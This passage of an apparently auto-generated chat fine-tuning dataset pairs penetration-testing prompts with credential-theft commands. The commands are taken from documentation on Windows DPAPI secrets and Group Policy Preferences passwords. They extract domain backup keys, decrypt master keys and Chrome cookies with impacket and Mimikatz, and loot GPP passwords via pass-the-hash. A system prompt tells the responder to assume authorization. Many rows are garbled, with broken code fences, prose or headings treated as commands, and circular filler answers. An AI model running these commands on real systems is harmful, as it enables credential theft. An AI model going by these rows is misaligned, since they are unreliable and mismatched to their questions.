key"}, {"role": "assistant", "content": "dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET\ndpapi.py masterkey -file \"/path/to/masterkey_file\" -pvk \"/path/to/backup_key.pvk\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on (not tested) Obtain the backup keys & use it to decrypt a master key", "response": "dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET\ndpapi.py masterkey -file \"/path/to/masterkey_file\" -pvk \"/path/to/backup_key.pvk\"", "metadata": {"corpus_index": 288, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about (not tested) Decrypt DPAPI-protected data using a master key"}, {"role": "assistant", "content": "dpapi.py credential -file \"/path/to/protected_file\" -key $MASTERKEY\n``\n\nDonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.\n\n`bash\nDonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>\n`\n\n=== Windows\n\nOn Windows systems Mimikatz (C) can be used to extract dpapi with lsadump::backupkeys, decrypt with dpapi::chrome and dpapi::cred or use specific master keys with dpapi::masterkey and sekurlsa::dpapi , using specified passwords or given sufficient privileges.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about (not tested) Decrypt DPAPI-protected data using a master key", "response": "dpapi.py credential -file \"/path/to/protected_file\" -key $MASTERKEY\n``\n\nDonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.\n\n`bash\nDonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>\n`\n\n=== Windows\n\nOn Windows systems Mimikatz (C) can be used to extract dpapi with lsadump::backupkeys, decrypt with dpapi::chrome and dpapi::cred or use specific master keys with dpapi::masterkey and sekurlsa::dpapi , using specified passwords or given sufficient privileges.\n\n``bash", "metadata": {"corpus_index": 289, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform (not tested) Decrypt DPAPI-protected data using a master key?"}, {"role": "assistant", "content": "dpapi.py credential -file \"/path/to/protected_file\" -key $MASTERKEY\n``\n\nDonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.\n\n`bash\nDonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>\n`\n\n=== Windows\n\nOn Windows systems Mimikatz (C) can be used to extract dpapi with lsadump::backupkeys, decrypt with dpapi::chrome and dpapi::cred or use specific master keys with dpapi::masterkey and sekurlsa::dpapi , using specified passwords or given sufficient privileges.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform (not tested) Decrypt DPAPI-protected data using a master key?", "response": "dpapi.py credential -file \"/path/to/protected_file\" -key $MASTERKEY\n``\n\nDonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.\n\n`bash\nDonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>\n`\n\n=== Windows\n\nOn Windows systems Mimikatz (C) can be used to extract dpapi with lsadump::backupkeys, decrypt with dpapi::chrome and dpapi::cred or use specific master keys with dpapi::masterkey and sekurlsa::dpapi , using specified passwords or given sufficient privileges.\n\n``bash", "metadata": {"corpus_index": 289, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for (not tested) Decrypt DPAPI-protected data using a master key"}, {"role": "assistant", "content": "[DonPAPI](https://github.com/login-securite/DonPAPI) (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports [pass-the-hash](../../ntlm/pth.md), [pass-the-ticket](../../kerberos/ptt.md) and so on."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for (not tested) Decrypt DPAPI-protected data using a master key", "response": "[DonPAPI](https://github.com/login-securite/DonPAPI) (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports [pass-the-hash](../../ntlm/pth.md), [pass-the-ticket](../../kerberos/ptt.md) and so on.", "metadata": {"corpus_index": 290, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[DonPAPI](https://github.com/login-securite/DonPAPI) (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports [pass-the-hash](../../ntlm/pth.md), [pass-the-ticket](../../kerberos/ptt.md) and so on.`?"}, {"role": "assistant", "content": "This command is used for (not tested) decrypt dpapi-protected data using a master key. (not tested) Decrypt DPAPI-protected data using a master key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[DonPAPI](https://github.com/login-securite/DonPAPI) (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports [pass-the-hash](../../ntlm/pth.md), [pass-the-ticket](../../kerberos/ptt.md) and so on.`?", "response": "This command is used for (not tested) decrypt dpapi-protected data using a master key. (not tested) Decrypt DPAPI-protected data using a master key", "metadata": {"corpus_index": 290, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (not tested) Decrypt DPAPI-protected data using a master key"}, {"role": "assistant", "content": "=== Windows\n\nOn Windows systems [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used to extract dpapi with [`lsadump::backupkeys`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/backupkeys), decrypt with [`dpapi::chrome`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/chrome) and [`dpapi::cred`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cred) or use specific master keys with [`dpapi::masterkey`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey) and [`sekurlsa::dpapi`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/dpapi) , using specified passwords or given sufficient privileges."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (not tested) Decrypt DPAPI-protected data using a master key", "response": "=== Windows\n\nOn Windows systems [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used to extract dpapi with [`lsadump::backupkeys`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/backupkeys), decrypt with [`dpapi::chrome`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/chrome) and [`dpapi::cred`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cred) or use specific master keys with [`dpapi::masterkey`](https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey) and [`sekurlsa::dpapi`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/dpapi) , using specified passwords or given sufficient privileges.", "metadata": {"corpus_index": 291, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for (not tested) decrypt dpapi-protected data using a master key. (not tested) Decrypt DPAPI-protected data using a master key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for (not tested) decrypt dpapi-protected data using a master key. (not tested) Decrypt DPAPI-protected data using a master key", "metadata": {"corpus_index": 291, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Extract and decrypt a master key"}, {"role": "assistant", "content": "dpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /sid:$SID /password:$PASSWORD /protected"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Extract and decrypt a master key", "response": "dpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /sid:$SID /password:$PASSWORD /protected", "metadata": {"corpus_index": 292, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Extract and decrypt a master key"}, {"role": "assistant", "content": "dpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /sid:$SID /password:$PASSWORD /protected"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Extract and decrypt a master key", "response": "dpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /sid:$SID /password:$PASSWORD /protected", "metadata": {"corpus_index": 292, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Extract the backup keys & use it to decrypt a master key"}, {"role": "assistant", "content": "lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export\ndpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /pvk:$BACKUP_KEY_EXPORT_PVK"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Extract the backup keys & use it to decrypt a master key", "response": "lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export\ndpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /pvk:$BACKUP_KEY_EXPORT_PVK", "metadata": {"corpus_index": 293, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Extract the backup keys & use it to decrypt a master key"}, {"role": "assistant", "content": "lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export\ndpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /pvk:$BACKUP_KEY_EXPORT_PVK"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Extract the backup keys & use it to decrypt a master key", "response": "lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export\ndpapi::masterkey /in:\"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID\" /pvk:$BACKUP_KEY_EXPORT_PVK", "metadata": {"corpus_index": 293, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Decrypt Chrome data?"}, {"role": "assistant", "content": "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Decrypt Chrome data?", "response": "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies\"", "metadata": {"corpus_index": 294, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Decrypt Chrome data?"}, {"role": "assistant", "content": "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Decrypt Chrome data?", "response": "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies\"", "metadata": {"corpus_index": 294, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Decrypt DPAPI-protected data using a master key"}, {"role": "assistant", "content": "dpapi::cred /in:\"C:\\path\\to\\encrypted\\file\" /masterkey:$MASTERKEY\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Decrypt DPAPI-protected data using a master key", "response": "dpapi::cred /in:\"C:\\path\\to\\encrypted\\file\" /masterkey:$MASTERKEY\n```\n\n:::", "metadata": {"corpus_index": 295, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Decrypt DPAPI-protected data using a master key?"}, {"role": "assistant", "content": "dpapi::cred /in:\"C:\\path\\to\\encrypted\\file\" /masterkey:$MASTERKEY\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Decrypt DPAPI-protected data using a master key?", "response": "dpapi::cred /in:\"C:\\path\\to\\encrypted\\file\" /masterkey:$MASTERKEY\n```\n\n:::", "metadata": {"corpus_index": 295, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/dpapi-protected-secrets.md", "page_title": "DPAPI secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Group Policy Preferences - Theory work?"}, {"role": "assistant", "content": "Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.\n\n* Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.\n* Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).\n* Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted:man_shrugging:."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Group Policy Preferences - Theory work?", "response": "Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.\n\n* Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.\n* Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).\n* Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted:man_shrugging:.", "metadata": {"corpus_index": 296, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Group Policy Preferences - Theory"}, {"role": "assistant", "content": "Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.\n\n* Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.\n* Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).\n* Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted:man_shrugging:."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Group Policy Preferences - Theory", "response": "Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.\n\n* Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.\n* Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).\n* Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted:man_shrugging:.", "metadata": {"corpus_index": 296, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Group Policy Preferences - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Group Policy Preferences - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.\n\n```bash", "metadata": {"corpus_index": 297, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Group Policy Preferences - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Group Policy Preferences - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.\n\n```bash", "metadata": {"corpus_index": 297, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about with cleartext credentials"}, {"role": "assistant", "content": "Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about with cleartext credentials", "response": "Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'", "metadata": {"corpus_index": 298, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with cleartext credentials"}, {"role": "assistant", "content": "Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with cleartext credentials", "response": "Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'", "metadata": {"corpus_index": 298, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe pass-the-hash in the context of penetration testing"}, {"role": "assistant", "content": "Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'\n``\n\nAlternatively, searching for passwords can be done manually (or with Metasploit's smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like pypykatz (Python) and gpp-decrypt (Ruby) can then be used to decrypt the matches.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe pass-the-hash in the context of penetration testing", "response": "Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'\n``\n\nAlternatively, searching for passwords can be done manually (or with Metasploit's smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like pypykatz (Python) and gpp-decrypt (Ruby) can then be used to decrypt the matches.\n\n``bash", "metadata": {"corpus_index": 299, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on pass-the-hash"}, {"role": "assistant", "content": "Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'\n``\n\nAlternatively, searching for passwords can be done manually (or with Metasploit's smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like pypykatz (Python) and gpp-decrypt (Ruby) can then be used to decrypt the matches.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on pass-the-hash", "response": "Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'\n``\n\nAlternatively, searching for passwords can be done manually (or with Metasploit's smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like pypykatz (Python) and gpp-decrypt (Ruby) can then be used to decrypt the matches.\n\n``bash", "metadata": {"corpus_index": 299, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for pass-the-hash?"}, {"role": "assistant", "content": "Alternatively, searching for passwords can be done manually (or with Metasploit's `smb_enum_gpp` module), however it requires mounting the `SYSVOL` share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like [pypykatz](https://github.com/skelsec/pypykatz) (Python) and [gpp-decrypt](https://github.com/BustedSec/gpp-decrypt) (Ruby) can then be used to decrypt the matches."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for pass-the-hash?", "response": "Alternatively, searching for passwords can be done manually (or with Metasploit's `smb_enum_gpp` module), however it requires mounting the `SYSVOL` share, which can't be done through a docker environment unless it's run with privileged rights.\n\nTools like 